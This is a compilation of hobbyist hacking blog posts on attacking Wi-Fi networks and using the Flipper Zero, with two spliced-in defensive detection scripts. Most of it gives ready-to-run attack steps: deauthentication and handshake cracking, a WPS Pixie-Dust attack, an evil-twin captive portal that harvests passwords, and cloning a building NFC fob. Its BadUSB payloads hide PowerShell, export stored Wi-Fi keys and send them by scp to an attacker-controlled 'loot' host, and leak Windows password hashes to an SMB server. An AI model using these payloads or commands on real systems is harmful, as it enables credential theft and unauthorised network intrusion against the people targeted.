How To Hack Wi-Fi Networks

Wi-Fi networks are everywhere! Whether you’re in an industrial or residential area, there will likely be a Wi-Fi access point nearby. They allow us to have instant access to any information we need. They allow us to communicate with people on the other side of the world. We’re living in interesting times where information travels at the speed of light. Hello world, welcome to haxez where today I will be explaining how to hack Wi-Fi networks. If you’re looking for more information on the subject then head over to this article on Bordergate. Also, please go and watch the video at the bottom of the page.

Wi-Fi Hacking Hardware

While it might be possible to perform some Wi-Fi attacks using your built-in Wi-Fi chipset, you will have better success with the proper kit. There are dozens of manufacturers that make claims that their product offers the required functionality. However, after purchasing a bunch of cheap products and some expensive ones, I can honestly say that the Alfa makes the best devices for the job. In order to hack wireless networks, you need to be able to put the card in monitor mode and be able to perform packet injection. Some Alfa cards may be better than others but I’ve had a lot of luck with the AWUS036ACH.

Alfa Card

Wi-Fi Brute-Force Attacks

One attack that doesn’t get mentioned much when discussing Wi-Fi hacking is brute force attacks. Brute force attacks are one of the most common methods that threat actors use to gain access to a system. If the system is secured using a weak password then a brute force attack should get you access to that system pretty quickly. Obviously, this discounts brute force protection mechanisms. However, you would be surprised at how many products don’t offer brute force protection by default. With a few lines of Python, it is possible to brute force the access point’s password. See this GitHub repository for an example.

Brute Force Wi-Fi Password

Wi-Fi Deauthentication Attack

A Wi-Fi deauthentication attack is an attack that abuses the built-in functionality of the access point. The threat actor would impersonate the access point and send spoofed packets to a client. These packets deauthenticate the client. As a result, the client is disconnected from the access point. In order for the client to reconnect to the access point, it needs to send the secret to re-authenticate. The threat actor can then intercept the packet containing the secret and crack it to reveal the access point’s password.

First, you need to put your Wi-Fi adapter into monitor mode and start capturing data. This can be done using airodump-ng.

sudo airodump-ng wlan0

Then, you should start receiving information about the access points nearby.

Wi-Fi Hacking Airodump-ng

Once you know which Wi-Fi network you want to attack, make a note of the BSSID and the channel number. Next, you need to start capturing packets from that AP and writing them to your local storage. This can be done using the airodump-ng tool again.

sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0

Capturing Wi-Fi Packets

Next, you need to identify a client to perform the attack. As you can see from the image above, one client has connected and we can see its station ID. Take note of the station ID as it will be needed for the next part of the attack. Using the tool aireplay-ng we can start creating the de-authentication packets and sending them to the client.

sudo aireplay-ng --deauth 4 -a <BSSID> -c <CLIENT STATION ID> wlan0

Wi-Fi Deauthentication Attack

Finally, it’s time to crack the password from the packet we just captured. In order to do this we need to use the tool aircrack-ng. First, we specify the wordlist, then the AP BSSID, and finally the packet capture file.

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap

Cracking the hash

WPS Pixie-Dust Attack

WPS, or Wi-Fi Protected Setup, is a feature of wireless access points that allows for easy pairing of wireless devices. It was created and released by Cisco in 2006 and has since seen several vulnerabilities. One of these vulnerabilities is known as a Pixie Dust attack, which brute forces the WPS feature of wireless access points. In order to carry out this attack we first need to set our Wi-Fi adapter to monitor mode.

sudo airmon-ng start wlan0

Next, we need to use the tool wash to identify Wi-Fi access points in the area that have WPS enabled.

sudo wash -i wlan0

WPS Pixie-Dust Attack

Take the BSSID and the channel number from the output. Finally, we need to run the tool reaver to start the attack. As you can see from the command below, we’re specifying the BSSID, and the channel number, adding verbosity, specifying an output file, and setting the pixie dust argument to 1. After a few moments, you will receive a bunch of output including the WPS pin and WPA PSK.

sudo reaver --interface wlan0 --bssid <BSSID> --channel <CHANNEL> -vv -N -O output.pcap --pixie-dust 1

Evil Twin Attack

An evil twin attack is an attack where the threat actor essentially clones a legitimate access point and coerces the victim to connect to it. Once the victim is connected, the threat actor can then carry out several attacks such as forcing the victim to submit their credentials to a captive portal. This type of attack can be performed using the tool wifiphisher. Once run, you will see a number of access points. Select the one you want to attack.

sudo wifiphisher

wifiphisher

The attack we’re going to be demonstrating is the captive portal attack which will ask the user for their password. Select the attack you want and the tool should start attacking the access point to deauth clients and prevent them from reconnecting.

available phishing scenarios

The clients should then automatically connect to the threat actor’s access point and load the captive portal. The portal will ask them for their password. The captive portal page can be customized to mimic social networking sites or even a page mimicking the ISP that provided the access point.

Wifi Captive Portal

Anything submitted to the captive portal is sent to the threat actor in clear text. If the user submits their Wi-Fi password then the threat actor could now connect to the victim’s Wi-Fi and access their internal network. If they submitted their social media details then the threat actor would have that password which could be used for other online services.

Clear text credentials captured.
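From the defender's side, the three attacks above all leave fingerprints in a monitor-mode capture: a deauthentication attack is a burst of deauth/disassoc frames from one source address, an access point with WPS enabled advertises a WPS information element in its beacons (which is what wash reads), and an evil twin is a second BSSID beaconing an SSID you already own. The following Python script is an added example, not code from this post or from any of the tools named above; using only the standard library it parses a little-endian pcap of raw 802.11 frames (link type 105, no trailing FCS assumed) and flags all three conditions. The sample capture is constructed inline from hand-built frames, so the MAC addresses, SSIDs, timings and thresholds are assumptions.

```python
"""Audit a monitor-mode capture for deauth floods, WPS-enabled access points
and SSIDs beaconed by more than one BSSID (added example, stdlib only)."""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105            # raw 802.11 frames, no radiotap header
BEACON, DISASSOC, DEAUTH = 0x80, 0xA0, 0xC0   # first frame-control byte of each subtype
WPS_OUI_TYPE = b"\x00\x50\xf2\x04"   # vendor-specific IE prefix used by WPS

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def iter_frames(pcap: bytes):
    """Yield (timestamp, frame) from a little-endian pcap of 802.11 frames."""
    magic, _, _, _, _, _, link = struct.unpack_from("<IHHiIII", pcap, 0)
    if magic != 0xA1B2C3D4 or link != LINKTYPE_IEEE802_11:
        raise ValueError("expected little-endian pcap with link type 105")
    off = 24
    while off + 16 <= len(pcap):
        sec, usec, incl, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        yield sec + usec / 1e6, pcap[off:off + incl]
        off += incl

def iter_ies(data: bytes):
    """Yield (tag, value) information elements; assumes no trailing FCS."""
    off = 0
    while off + 2 <= len(data):
        tag, length = data[off], data[off + 1]
        yield tag, data[off + 2:off + 2 + length]
        off += 2 + length

def audit(pcap: bytes, flood_threshold: int = 10, window_s: float = 1.0) -> dict:
    """Thresholds are assumptions: flag a source sending flood_threshold or more
    deauth/disassoc frames inside any window_s span."""
    mgmt_times = defaultdict(list)   # source MAC -> times of deauth/disassoc frames
    wps_aps = {}                     # BSSID -> SSID for APs advertising WPS
    ssid_bssids = defaultdict(set)   # SSID -> BSSIDs beaconing it
    for ts, frame in iter_frames(pcap):
        if len(frame) < 24:          # shorter than a management header
            continue
        subtype, src, bssid, body = frame[0], mac(frame[10:16]), mac(frame[16:22]), frame[24:]
        if subtype in (DEAUTH, DISASSOC):
            mgmt_times[src].append(ts)
        elif subtype == BEACON and len(body) >= 12:   # timestamp, interval, capabilities
            ssid, wps = None, False
            for tag, value in iter_ies(body[12:]):
                if tag == 0:
                    ssid = value.decode("utf-8", "replace")
                elif tag == 0xDD and value.startswith(WPS_OUI_TYPE):
                    wps = True
            if ssid is not None:
                ssid_bssids[ssid].add(bssid)
                if wps:
                    wps_aps[bssid] = ssid
    floods = {}
    for src, times in mgmt_times.items():
        times.sort()
        j, peak = 0, 0
        for i, t in enumerate(times):            # sliding window over timestamps
            while t - times[j] > window_s:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= flood_threshold:
            floods[src] = peak
    twins = {s: sorted(b) for s, b in ssid_bssids.items() if len(b) > 1}
    return {"deauth_floods": floods, "wps_enabled": wps_aps, "duplicate_ssids": twins}

# --- constructed sample capture; addresses, SSIDs and timings are made up ---
def mgmt_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes, body: bytes) -> bytes:
    return bytes([subtype, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

def beacon(bssid: bytes, ssid: str, wps: bool) -> bytes:
    ies = bytes([0, len(ssid)]) + ssid.encode()
    if wps:   # WPS IE carrying just a Version attribute (0x104A = 1.0)
        wps_ie = WPS_OUI_TYPE + b"\x10\x4a\x00\x01\x10"
        ies += bytes([0xDD, len(wps_ie)]) + wps_ie
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) + ies
    return mgmt_frame(BEACON, b"\xff" * 6, bssid, bssid, body)

def pcap_file(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for ts, f in frames:
        out += struct.pack("<IIII", int(ts), round((ts % 1) * 1e6), len(f), len(f)) + f
    return out

AP_HOME, AP_TWIN, AP_OFFICE, CLIENT = (bytes.fromhex(h) for h in
                                       ("020000000001", "020000000002", "020000000003", "0200000000aa"))
SAMPLE_FRAMES = [(0.0, beacon(AP_HOME, "HomeNet", wps=True)),
                 (0.1, beacon(AP_TWIN, "HomeNet", wps=False)),    # same SSID, different BSSID
                 (0.2, beacon(AP_OFFICE, "Office", wps=False)),
                 (5.0, mgmt_frame(DISASSOC, CLIENT, AP_OFFICE, AP_OFFICE, struct.pack("<H", 8)))]
# 20 deauth frames in 0.4 s, spoofed from the home AP's address (reason code 7)
SAMPLE_FRAMES += [(1.0 + 0.02 * k, mgmt_frame(DEAUTH, CLIENT, AP_HOME, AP_HOME, struct.pack("<H", 7)))
                  for k in range(20)]
SAMPLE_PCAP = pcap_file(SAMPLE_FRAMES)

if __name__ == "__main__":
    print(audit(SAMPLE_PCAP))
```

Run against a real capture by reading the .cap written by airodump-ng --write (raw 802.11 frames) into audit(); a capture with radiotap headers (tcpdump or Wireshark on a monitor interface) would need the radiotap header stripped first. The fixes behind each finding are the ones the conclusions below give: Protected Management Frames (802.11w, ieee80211w=2 in hostapd) stop the deauth flood, WPS should simply be off, and a second BSSID beaconing your SSID is worth walking over to, since no password strength helps against a portal the user types it into.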

Wi-Fi Hacking With Wifite

We have covered a lot of attacks, some of which have a complicated setup and use multiple tools. However, there is one tool that does almost all of them. That tool is called wifite and it’s a wrapper for the other tools we have used. It’s simple to use: all you need to do is run the wifite command. Within a few seconds, you should start seeing Wi-Fi networks pop up.

sudo wifite

Wi-Fi - Wifite

When you see the network you want to attack, press control c to stop scanning. Then, input the number of the network you want to attack. Wifite will then go through each attack until it finds an attack that works. If you know that a certain type of attack isn’t going to work, it can be skipped with control c. Finally, if the attack is successful, it should automatically crack the password and display the results.

hacked

Wi-Fi Hacking Conclusions

While technology is catching up to these types of attacks, your home access point may not have those features. Also, it may not be configured to protect against these attacks out of the box. You want to make sure you’re using long complex passwords not found in wordlists. This will help ensure that even if the threat actor captures the secret, they can’t crack it. Furthermore, you should disable technologies like WPS. If you need it to connect a printer, do so but then disable it after. Anyway, the real reason for this post is to try and get more eyes on the demonstration video below. Please go check it out.

Stealing Passwords With The Flipper Zero

Hello world and welcome to HaXeZ, in this post I’m going to be stealing passwords with the Flipper Zero. A Bad USB attack is an attack that leverages the trust that computers have for USB devices like keyboards. We will use this attack to perform keystroke injection to carry out our evil intentions. Ok, it’s a purely educational post to show the dangers of such an attack. But also because Flipper Zero has a really cool UI for doing such attacks. The following payloads can all be found at https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. I take no credit for any of them.

Flipper Zero Bad USB Menu

Our First Flipper Zero BadUSB Payload

The first thing we’re going to do is create a payload that opens up a terminal and executes a command. For this, we’re going to be using Ducky Script, which is the native language of the Hak5 USB Rubber Ducky. The script below starts with a delay of 100. This is to ensure that the computer has recognized the device before executing the script. Then, it has a comment of “opens run”. Next, the script injects the Windows key (GUI) and the r key. This combination of keys opens the run dialog box. Then, there is another delay of 100 seconds before a string of text is injected. The text string is injected into the run box and tells the system to open a Powershell window.

The script then has a delay of 1000 to wait for the Powershell window to open. After that, the script injects a string telling Powershell to load the PresentationFramework assembly. This assembly is required for creating pop-up boxes. Next, the script injects enter followed by another delay and then another string. This string will create a pop-up box informing the user that they have been hacked.

DELAY 100
REM opens run
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER
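What makes this payload work is that the host treats a newly enumerated keyboard as trusted and accepts whatever it types at machine speed. One host-side defence, the heuristic behind keystroke-injection detectors such as duckhunt, keys off exactly that: inter-keystroke gaps of a few milliseconds sustained across a whole string. The Python below is an added example, not code from this post, from Hak5 or from the Flipper project; it flags such bursts in a timestamped keystroke stream. The stream, the thresholds and the key names are constructed assumptions; a real deployment would feed it events from a keyboard hook or input-device log.

```python
"""Flag keystroke bursts that arrive faster than a human can type, the
heuristic behind keystroke-injection detectors (added example)."""
from dataclasses import dataclass
from typing import List, Tuple

# Assumed thresholds: human inter-key gaps rarely stay under ~40 ms across a
# whole word, while injected text lands at a few ms per key.
MAX_INJECTED_GAP_MS = 20
MIN_BURST_LEN = 8


@dataclass
class KeyEvent:
    t_ms: int   # arrival time in milliseconds
    key: str    # character or key name


def find_injection_bursts(events: List[KeyEvent]) -> List[Tuple[int, int, str]]:
    """Return (first_index, last_index, text) for every run of at least
    MIN_BURST_LEN consecutive keystrokes whose gaps never exceed
    MAX_INJECTED_GAP_MS. Events must be in arrival order."""
    bursts = []
    start = 0
    for i in range(1, len(events) + 1):
        in_run = i < len(events) and events[i].t_ms - events[i - 1].t_ms <= MAX_INJECTED_GAP_MS
        if not in_run:                      # run ends here (or the stream ended)
            if i - start >= MIN_BURST_LEN:
                bursts.append((start, i - 1, "".join(e.key for e in events[start:i])))
            start = i
    return bursts


def keystrokes(text: str, start_ms: int, gap_ms: int) -> List[KeyEvent]:
    """Construct a stream for text typed at a fixed cadence (sample data only)."""
    return [KeyEvent(start_ms + i * gap_ms, ch) for i, ch in enumerate(text)]


# Constructed stream: a human types "hello", a BadUSB injects a command at
# 3 ms per key, then the human types "bye".
SAMPLE = (keystrokes("hello", 0, 130)
          + keystrokes("powershell -windowstyle hidden", 5000, 3)
          + keystrokes("bye", 9000, 140))

if __name__ == "__main__":
    for first, last, text in find_injection_bursts(SAMPLE):
        print(f"injection suspected at events {first}-{last}: {text!r}")
```

Clipboard pastes and browser autofill do not pass through the keyboard as individual keystrokes, so they do not trigger this check; programmable macro keyboards do, so the thresholds need tuning per fleet. The usual response on a hit is to lock the session and record the device that produced the input.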

Now, we need to save it as a text file and drop it into the BadUSB directory on the Flipper. Then, to test it, we need to close the Flipper desktop application. After that, connect the Flipper Zero again and navigate to the Bad USB payloads. Then, select the payload and run it.

BadUSB Directory

Flipper BadUSB Browser Pranks

Granted the previous payload doesn’t really do anything. However, it does demonstrate that the Flipper can be used to launch a Powershell window and execute commands. With that in mind, we can leverage that ability to perform other types of pranks or attacks.

For example, wouldn’t it be fun if you could “instantly” Rick Roll someone by connecting to their computer? The script below sort of does that. As with the previous script, it first has a delay of 100 and then it launches the run dialog box. Then, it inserts a URL which the run box will open with the system’s default browser. Next, it has another delay and then types the f key to make the video full screen. It then hits the F11 key to hide the URL and menu bars. Granted, it isn’t perfect. Some browsers don’t auto-play videos but you can tinker with it to make it better.

REM Rick Rolling
DELAY 100
REM opens run
GUI r
DELAY 100
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley
ENTER
DELAY 1000
REM f makes the video full screen, F11 hides the browser's URL and menu bars
STRING f
DELAY 1000
F11

BadUSB Rick Roll

Stealing Wi-Fi Passwords

Stealing Wi-Fi passwords is pretty simple with Flipper Zero. However, exfiltrating the Wi-Fi passwords from the victim’s system is where you may run into problems. You should definitely not use the method below. It’s dirty and quick and would allow anyone to find the password for your server. It uses SCP to upload the files to your server which requires authenticating. I’m using it as a quick way to demonstrate stealing Wi-Fi passwords. You should absolutely use something more secure such as sending the data via email or a POST request to a web server.

With the obvious out the way, this script launches a Windows Command Prompt and changes the directory to the temp directory. Next, it runs a command to export the Wi-Fi network settings for the access points remembered by the target. It spits these out as XML files in the %temp% directory. Next is where you should absolutely change the script. It uses SCP to transfer the files to the server. However, the server requires authentication so it adds a delay and then inputs the password of kali as a string.

Note that if this victim’s machine hasn’t spoken to your Kali server before then it will first need to accept the SSH disclaimer. This could be achieved by adding in another “ENTER” after the scp command and before the password is passed as a string.

REM Wifi password stealer
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM exports the wifi passwords as XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM copies the files to the kali host
STRING scp -r %temp%/*.xml kali@192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

The image below shows that the files have been successfully transferred to the Kali server using the SCP tool.

Stealing Wi-Fi Passwords

The screenshot below shows the output from using cat against the file. The highlighted section is the password for the access point called “Super Secure Access Point”. The password is Password1337!@ which a threat actor could now use to connect to the access point. Once on the network, they could get up to all sorts of nefarious things.

Wi-Fi Password Stolen

Stealing Windows Passwords Hashes

The next payload is taken directly from Hak5 and was a good attack against machines connected to a domain. Furthermore, it had the potential to allow you to steal Windows password hashes in a matter of seconds. It requires the use of the Impacket smbserver.py Python script.

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

The screenshot below illustrates stealing Windows password hashes using the USB Rubber Ducky payload above. As you can see the user joseph on the host authenticated successfully against the SMB server thus submitting the password hash to the server. This hash can now be taken offline and cracked.

Stealing Windows Passwords Hashes

For the full Hak5 write up please see the URL https://shop.hak5.org/blogs/usb-rubber-ducky/whats-the-quickest-way-to-steal-a-windows-password-hash. Hak5 also has an awesome write-up of using Mimikatz with the USB Rubber Ducky to steal Windows password hashes. I highly recommend giving it a read here https://shop.hak5.org/blogs/usb-rubber-ducky/15-second-password-hack-mr-robot-style.

Conclusions

I’m having a lot of fun with the Flipper Zero. The reason why I like the BadUSB feature so much is because of the user interface it provides. The fact that you have an easy-to-navigate user interface for selecting payloads makes it much more user-friendly. It allows you to store multiple payloads and select them easily which could be really useful for physical intrusion assessments. You could be in an environment that has Windows, Linux, and Apple machines. You could load your Flipper with various different payloads for various different operating systems and go nuts.

Marauding Wi-Fi Networks With The Flipper Zero

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

Flipper Zero Wi-Fi developer board

Installing Marauder to the Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. Obviously, as I’m in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (Ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Booting the Wi-Fi Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Installing Marauder firmware

Adding Wi-Fi Functionality To The Flipper Zero

Unfortunately, Flipper Zero doesn’t have the functionality to use the Marauder firmware out of the box. However, you can install some custom firmware that contains the Marauder tools in order to use it. That is going to be outside the scope of this post, but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you’ve read that, come back here and finish the article.

Making Flipper Zero Ultra with RogueMaster Firmware

Marauder Menu

Now that you have Marauder and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. In order to access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scan AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Marauder Wi-Fi Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Scanning For Wi-Fi Access Points

Listing Access Points

The next option in the list is to list the access points that you have just scanned. This is a convenient feature as it assigns a number to each of the access points. This number can be used later to select the access point you want to attack. The image below shows the results of running the list command after running the Scan AP command. As you can see, it shows 5 access points (0 to 5). However, the list can be scrolled on indefinitely depending on the number of access points.

List of Wi-Fi access points

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Selecting An Access Point

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the YouTube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Wi-Fi Rick Roll Attack

Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack can be useful when trying to capture handshakes. Wireless handshakes will contain the hashed password for the access point. Capturing the hash would allow you to crack it and then access the access point. The de-authentication attack works by sending de-authentication frames to the wireless access point. This packet is usually spoofed from the client and forces them to disconnect.

Wi-Fi De-Authentication Attack

Probe Attack

Probes are sent out by devices when not connected to a wireless access point. They send probes for access points that they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests to the select access point. I believe the desired output of this attack is to confuse the access point and potentially consume resources leading to a denial of service conditions. Don’t quote me on that though as I’m not 100% sure and am just going off of the articles I’ve read so far. I will update this if I get any more insight into the purpose of this attack.

Wi-Fi Probe Attack

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options including sniffing de-authentication packets, Pwnagotchi packets, beacon packets, ESP packets, and PMKID packets. I haven’t played with the sniffing options too much but it doesn’t seem like you can run both attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Sniffing

Conclusions

There is a lot more to the Marauder firmware than I’ve covered in this post. It has the ability to sniff packets and other things that I haven’t explored yet. However, I wanted to make a post about it as there aren’t many posts about it. Hopefully, this should get you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you’re looking to increase its functionality. I can’t wait to see what other things people make.

Making Flipper Zero Ultra with RogueMaster Firmware

Hello world and welcome to Haxez, in this post I’m going to be installing the RogueMaster Flipper Zero firmware. The RogueMaster firmware adds more functionality to the device by installing community applications. Installing the RogueMaster firmware is a fairly straightforward process. However, it is probably best to ensure you have updated and backed up your device first.

Updating The Flipper Zero

First, let’s update the device to the latest version. This can be done relatively quickly by installing the desktop application. You can download the application here and installing it is just a case of following the wizard. Once the application is installed, connect your device to it and look for the big green update button. Click the button and wait for the installation process to complete.

Updating the Flipper Zero

Back-Up The Flipper Zero

You should back up your device by heading to the spanner tab and clicking the backup button. When clicked, this button will spawn a Windows explorer window asking you where you want to save your backup. Then, choose a safe location on your computer and click save. Now that you have updated and backed up your device, it’s time to find the firmware.

Back-Up The Flipper Zero

Finding RogueMaster Firmware

The RogueMaster firmware can be found by performing a Google search for RogueMaster Firmware. In fact, the correct GitHub page should be the first result. Click the link and visit the page and then look for the correct repository.

RogueMaster GitHub Page

Once there, look for the released section. It should be on the right-hand side of the page. While there should be three options, the one I’m going to be downloading is the .tgz file. However, this could be a .zip file depending on the current release. A .tgz file is an archiving format similar to .zip but you may need to install an additional tool like 7zip to extract it. Just right-click the downloaded file and select 7zip from the context menu, then select extract. You may need to extract the extracted file.

RogueMaster Firmware Download

Uploading The Files

Once the tar.gz and tar files have been extracted, head to the Flipper desktop application and navigate to the SD card. Locate the update directory and navigate to it. Then, drag the extracted directory to the uploads directory. You may get an error message complaining that the files are too large. However, it is safe to ignore that message.

Uploading The Files

Installing The RogueMaster Firmware

Now that the files have been uploaded, head back to the main screen of the application and click on the Flipper Zero screen to expand it. Then, press the down button followed by the left button. That should allow you to browse the directories on the Flipper Zero including the update directory. From there, you should be able to navigate to the uploaded directory and locate the update package. Click on the package and select Run in app.

Installing The RogueMaster Firmware

Flipper Zero Update Complete

If you successfully installed the firmware then you should get a lovely picture of Goku suggesting that the installation was successful. Furthermore, you should get a link to join the GitHub community. If you run into issues then just reinstall the default software and go back through the installation process.

Update Complete

Flipper Zero RogueMaster New Features

The RogueMaster firmware includes many new features including the Sub-GHz frequencies required to hack open the Tesla charge ports. There is also a vast selection of games including Doom, Flappy Bird, Tetris, and Tic Tac Toe. To list all of the features and their purposes would require devoting an entire blog post. Feel free to check out my video where I go into a bit more detail.

New Features

Unleashing the power of the Flipper Zero

Hello world and welcome to Haxez, today we’re unleashing the power of the Flipper Zero by installing custom firmware. However, the first thing we need to do is ensure that the flipper is up to date. Therefore, head to the following URL and download the updater. Disclaimer, I’m not affiliated with the makers of the Flipper Zero in any way, nor is this sponsored. I’m merely making content for it because I like the device.

Updating Flipper Firmware

Updating Flipper Zero

Once the Flipper Zero desktop software is downloaded, launch it from the icon. Then, connect your Flipper Zero to your computer via the supplied USB C cable. The application should automatically detect the version of firmware that you have installed. If you’re up to date then you can skip this step. However, if you’re out of date then proceed and click the install button.

Updating The Flipper Zero

Backing Up Flipper Zero

Next, it is probably a good idea to back up your device. This can be accomplished fairly easily by clicking on the spanner menu button. There, you will have a number of options including backup, restore, erase and check for updates. All you need to do is click the backup button and save the file that it creates to a safe location.

Backing Up Flipper Zero

According to the Flipper blog, the firmware update process is fairly bulletproof. However, whenever you’re updating firmware whether it’s your BIOS or you’re rooting a phone, you need to be careful. If the device was to lose power while the new firmware is being written, it could brick your device. The Flipper device seems to have a method for updating the firmware whereby the old firmware remains on the device until the firmware is installed.

Flipper Zero Update Process
Flipper Zero Update Process

Finding Custom Firmware

Now that you have updated your Flipper and have taken a backup, it’s time to find some custom Firmware. The firmware that I’m going to be installing is called the unleashed firmware by Eng1n33r. This firmware is easy to install and has a number of different additional features. Notably, the firmware includes some community applications that provide functionality like fuzzing. Furthermore, there are some games including Doom.

Flipper Zero Unleashed Firmware

Downloading Custom Firmware

In order to download the custom firmware, head to the releases page on Github. There, you will see a link to a .tgz file. Click the link and save the file to a safe location on your computer. Please be advised that there is a web installer that can simplify the installation process. However, when I attempted to use the web updater it didn’t work. You need to use a Chromium-based browser but I think I had problems due to the firmware version I had installed.

Downloading Custom Firmware

Installing Flipper Zero Custom Firmware

In order to install the custom firmware, all you need to do is head back to the Flipper Desktop application. Back on the settings page, you will find an option to install from the file. Click that option and navigate to the .tgz file that you just downloaded. The desktop application will then switch to a progress bar showing you the installation progress.

Installing Custom Firmware

Once the Flipper desktop application reaches 100% it should prompt you to say to follow along on the Flipper Zero device itself. After a few minutes, you should get a notification that the Unleashed firmware has been installed successfully. It should look similar to the image below.

Unleashed Firmware Successfully Installed

Unleashed Firmware Features

I’m not going to go into all the features of the firmware in this post. Perhaps, this is something I will write another post and create another video on at a later date. It is packed with new apps including games though. If you fancy playing a bit of Doom, Tetris, or Flappy Bird in between your hacking activities then you now have the option to do that. You can see the full list of features on this page.

Unleashed Firmware Features

Conclusions

This post wasn’t meant to be a full breakdown of all the different features of the Unleashed Firmware. That is something I may go into more at a later date. The purpose of this post was to explain how to locate and safely install custom firmware. The developer has great installation instructions on their GitHub page so this article may be redundant but I wanted to create one. I’m enjoying using the unleashed firmware. It adds some great functionality. However, I will probably be looking at moving to the Roguemaster firmware in the near future.

Hack all the things with the Flipper Zero. Unboxing, Updating, and Playing

Hello world and welcome to Haxez. Recently, I was lucky enough to have my Flipper Zero delivered. If you don’t know what the Flipper Zero is then you should absolutely check it out. In their own words, it is a Swiss army knife for hackers. It has many different features including a cute dolphin Tamagotchi.

Unboxing the Flipper Zero

The Flipper Zero comes in a neat cardboard box with some cool graphics. The box was sealed with tape which was easily dispatched with a knife. Opening the box, you are presented with the instruction manual document. Underneath the manual is a foam housing protecting a USB C cable. Then, underneath the foam USB C holder is the glorious Flipper Zero. Not much more to say about it than that.

Unboxing the Flipper Zero

Updating The Flipper Zero

Updating the device was relatively simple. In fact, all I had to do was visit the software URL and download the installer. Once the software was installed, I connected the device to my laptop and it instantly recognized it. As can be seen from the image below, the interface is great and it has an obvious Update button. In summary, the update process took about 10 minutes, with most of that time taken up by writing the firmware to the device.

Updating The Flipper Zero

NFC Hacking

The device has the ability to clone and simulate NFC or near-field communication signals. Instantly, I decided to check this out by cloning the fob I used to enter my flat. Overall, the process was straightforward and worked like a charm. In short, you select NFC from the menu and then select read. Then, save the NFC signal to the device and use the simulate option to send the signal. Suddenly, the door unlocked and I was into my building.

NFC Hacking

BadUSB

The device also has a built-in BadUSB. To explain, a BadUSB is a device that can emulate keyboard input. Darren Kitchen from Hak5 brought this weakness of trusted devices to the attention of the hacker community when they released the USB Rubber Ducky. Since then, it has been a viable attack vector to quickly execute commands on a host that you have physical access to. It was really intuitive to use: plug in the device, select the payload from the menu, and it executes it.

BadUSB

Infrared

I used to have an infrared light on my mobile phone and I thought it was the coolest thing ever. Being able to change channels on anyone’s TV gave me a silly sense of power. Since then, I have upgraded and lost that functionality. However, that power has now been restored with the Flipper Zero. After applying the update you get access to a universal remote control which you can use to control the universe… wait, I mean TVs and other infrared devices.

Infrared

Conclusions

